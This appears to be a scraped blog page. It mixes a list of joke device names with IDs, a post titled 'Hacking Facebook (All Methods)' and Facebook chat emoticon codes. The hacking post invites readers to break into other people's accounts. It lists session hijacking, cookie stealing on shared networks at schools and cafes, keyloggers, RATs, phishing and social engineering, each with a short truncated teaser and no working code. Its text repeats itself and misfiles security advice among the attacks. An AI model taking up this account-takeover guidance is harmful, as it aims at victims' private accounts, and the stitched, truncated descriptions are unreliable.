- Vibrator (eb4c6d1a60e19a7795da501e1f468035)
- Sperm Whale (170318539700306)
- Pogo Stick (185103391549701)
- Banana Phone (1477a4cd29ec724a3de19be5d26e0389)
- Google+ (4d8243dbb7064f88351fe6c809582320)
- The Future (108372819220732)
- Smoke Signal (134138923334682)
- tin cans connected by string (242191299125647)
- Pokedex (de3da265cf6976745bb1d60a8c198151)
- Telepathy (ea01a57edb26cf1de143f09d45cfa913)
- Typewriter (d3d554bf60297cb2c384e3d7cf5a066d)
- Harry Potter (b8ebeb983f45eaa0bd5f4f66cad97654)
- TARDIS (200439256674396)
- Pip Boy (142806259133078)
- Mind Control (1dc633368924b3b0b4d08e3f83230760)
- Jedi Mind Control (240597869302110)
- Telekinesis (224139600960217)
- Post-It Note (115227201900831)
- GLaDOS (246126362083515)
- Ansible (185474028180003)
- W.O.P.R (228373497202865)
- Airwolf (123944137696757)
- HMCS Belafonte (222345601140304)
- HAPPY BIRTHDAY (60280877509)
Hacking Facebook (All Methods)
So You Guys wanna Learn Facebook Hacking. ..How to Hack Facebook Accounts Easily Yeah And I Mean It.
So Here Goes All Methods Of Facebook Hacking From Zero To One .. .
Let's Go.
Before Starting I Think You Guys All Know What Is Facebook How To Use It .. That's Why You Are Here.
So Before Starting Let me Clear One thing There's No Such Software Exists Which Will Hack Facebook for You
The Only Two Methods By Which You Can Hack Facebook Is
So Here Goes All Methods Of Facebook Hacking From Zero To One .. .
Let's Go.
Before Starting I Think You Guys All Know What Is Facebook How To Use It .. That's Why You Are Here.
So Before Starting Let me Clear One thing There's No Such Software Exists Which Will Hack Facebook for You
The Only Two Methods By Which You Can Hack Facebook Is
- Hire A Professional Hacker Who Will Hack For You
- Or Just Learn All These Methods which i'm Gonna Provide you
Facebook Hacking Methods Are Following:
1. Session Hijacking Attack
2. Facebook Security
3. Cookie Stealing Attack
4. Keylogging
5. Clickjacking
6. Tabnabbing
7. Remote Administration Tools
8. Social Engineering Attack
9. Phishing attack
10. Using 3 Fake Friends Method
- Session Hijacking Attack :- What Is Session Hijacking Attack ? Session hijacking, also known as TCP session hijacking, is a method of taking over a Web user session by surreptitiously obtaining the session ID and masquerading as the authorized user. Once the user's session ID has been accessed (through session prediction), the attacker can masquerade as that user and do anything the user is authorized to do on the network.
- Facebook Security :- When you bookmark the URL for Facebook or any of your other social networks, be sure to use HTTPS instead of HTTP. This encrypts your communications. In fact, you will have to temporarily disable this feature any time you give access to a new application. That alone should give you confidence that you have achieved a greater level of protection.
- Cookie Stealing Attack :- In this tutorial i will explain how you can hack a Facebook/twitter accounts by stealing cookies. This method works only when the victims computer is in a LAN (local area network ).Best place to try out this is in schools ,collages ,cafes . where computers are connected in LAN .Before i proceed let me first...
- Keylogging :- What Is Keyloggers? Using key logger utility you will be able to establish full control over your computer. You will also find out, what was going on your computer in your absence: what was run and typed etc which act as best children internet protection software. Using the keylogging program constantly,...
- Clickjacking :- What is Clickjacking? Clickjacking is a technique used by hackers or spammers to trick or cheat the users into clicking on links or buttons that are hidden from normal view (usually links color is same as page background). Clickjacking is possible because of a security weakness in web browsers that allows...
- Tabnabbing :- Hey friends,It's Chris Defaulter Valentine.An Microsoft Certified Systems Engineer (MCSE),Internet Marketer IIT hacker I Have 10 Years' Experience Circumventing Information Security Measures And Can Report That I've Successfully Compromised All Systems That I Targeted For Unauthorized Access Except One. I Have...
- Remote Administration Tools :- A remote administration tool (or RAT) is a program that allows certain persons to connect to and manage remote computers in the Internet or across a local network. A remote administration tool is based on the server and client technology. The server part runs on a controlled computer and receives commands...
- Social Engineering Attack :- I myself have had a few people in the past ask me questions on social engineering. I always say to anyone, you need to imagine social engineering as a game. But before i talk about the 'Game', I want to go into detail about Basic knowledge and self preparation. Basic knowledge and self preparation: It's...
- Phishing attack :- Phishing - is an e-mail fraud method in which the perpetrator sends out legitimate-looking email in an attempt to gather personal and financial information from recipients. Typically, the messages appear to come from well known and trustworthy Web sites. Web sites that are frequently spoofed by phishers include...
- Using 3 Fake Friends Method :- Hack Facebook Account" is most popular term is the in Web, Previously I posted many articles on "Hack Facebook Accounts" with Keyloggers, phishing, etc but that Hacking Of Facebook Account methods are not working fine now a days. So Hackers have to go smarter and we have found a new security hole
6 Awesome Facebook Chat Trick
MUST TRY This in Your Chat Box / FB Message
Just Copy the CODE and Paste it... Have FUN~
(Note: This is only works in PC/Laptop...Will not work if you're chatting from Mobile! )
TRY THIS...ITS AMAZING.. :)
Dont try it in comments it will not work... try it in chat and msg from pc to ur friends
1.Mask
[[255006724575192]] [[255006727908525]] [[255006737908524]] [[255006734575191]] [[255006731241858]]
[[255006827908515]] [[255006831241848]] [[255006824575182]] [[255006817908516]] [[255006821241849]]
[[255006874575177]] [[255006871241844]] [[255006884575176]] [[255006877908510]] [[255006881241843]]
[[255006934575171]] [[255006931241838]] [[255006941241837]] [[255006944575170]] [[255006937908504]]
[[255007004575164]] [[255007001241831]] [[255006994575165]] [[255006997908498]] [[255006991241832]]
[[255007084575156]] [[255007101241821]] [[255007077908490]] [[255007091241822]] [[255007081241823]]
2. Jack Sparrow
[[298356520217565]] [[298356516884232]] [[298356506884233]] [[298356510217566]]
[[298356513550899]] [[298356620217555]] [[298356606884223]] [[298356616884222]]
[[298356610217556]] [[298356613550889]] [[298356673550883]] [[298356676884216]]
[[298356666884217]] [[298356680217549]] [[298356670217550]] [[298356740217543]]
[[298356733550877]] [[298356743550876]] [[298356730217544]] [[298356736884210]]
[[298356823550868]] [[298356810217536]] [[298356820217535]] [[298356826884201]]
[[298356813550869]] [[298356906884193]] [[298356896884194]] [[298356900217527]]
[[298356903550860]] [[298356893550861]] [[298356950217522]] [[298356946884189]]
3. Superman
[[299528860107644]] [[299528863440977]] [[299528866774310]] [[299528856774311]]
[[299528870107643]] [[299528950107635]] [[299528943440969]] [[299528946774302]]
[[299528953440968]] [[299528956774301]] [[299529013440962]] [[299529016774295]]
[[299529010107629]] [[299529003440963]] [[299529006774296]] [[299529060107624]]
[[299529063440957]] [[299529066774290]] [[299529070107623]] [[299529073440956]]
[[299529173440946]] [[299529183440945]] [[299529180107612]] [[299529176774279]]
[[299529186774278]] [[299529243440939]] [[299529236774273]] [[299529240107606]]
4. Elmo
[[302117289844540]] [[302117283177874]] [[302117276511208]] [[302117279844541]] [[302117286511207]] [[302117366511199]]
[[302117369844532]] [[302117373177865]] [[302117383177864]] [[302117379844531]] [[302117426511193]] [[302117436511192]]
[[302117429844526]] [[302117423177860]] [[302117433177859]] [[302117523177850]] [[302117529844516]] [[302117526511183]]
[[302117536511182]] [[302117533177849]] [[302117606511175]] [[302117596511176]] [[302117599844509]] [[302117593177843]]
[[302117603177842]] [[302117646511171]] [[302117649844504]] [[302117659844503]] [[302117656511170]] [[302117653177837]]
[[302117706511165]] [[302117703177832]] [[302117699844499]] [[302117709844498]] [[302117696511166]] [[302117749844494]]
5. Troll face
[[242538225822042]] [[242538222488709]] [[242538232488708]] [[242538219155376]] [[242538229155375]] [[242538339155364]]
[[242538335822031]] [[242538342488697]] [[242538345822030]] [[242538349155363]] [[242538392488692]] [[242538395822025]]
[[242538399155358]] [[242538402488691]] [[242538405822024]] [[242538475822017]] [[242538472488684]] [[242538489155349]]
[[242538492488682]] [[242538485822016]] [[242538562488675]] [[242538565822008]] [[242538569155341]] [[242538575822007]]
[[242538572488674]] [[242538612488670]] [[242538625822002]] [[242538619155336]] [[242538622488669]] [[242538615822003]]
[[242538675821997]] [[242538682488663]] [[242538672488664]] [[242538679155330]] [[242538685821996]] [[242538742488657]]
6. Mr. Bean
[[255016264574238]] [[255016271240904]] [[255016277907570]]
[[255016267907571]] [[255016274574237]] [[255016384574226]]
[[255016387907559]] [[255016394574225]] [[255016401240891]]
[[255016391240892]] [[255016464574218]] [[255016454574219]]
[[255016457907552]] [[255016461240885]] [[255016451240886]]
[[255016537907544]] [[255016531240878]] [[255016534574211]]
[[255016541240877]] [[255016527907545]] [[255016634574201]]
Subscribe to:
Posts
(
Atom
)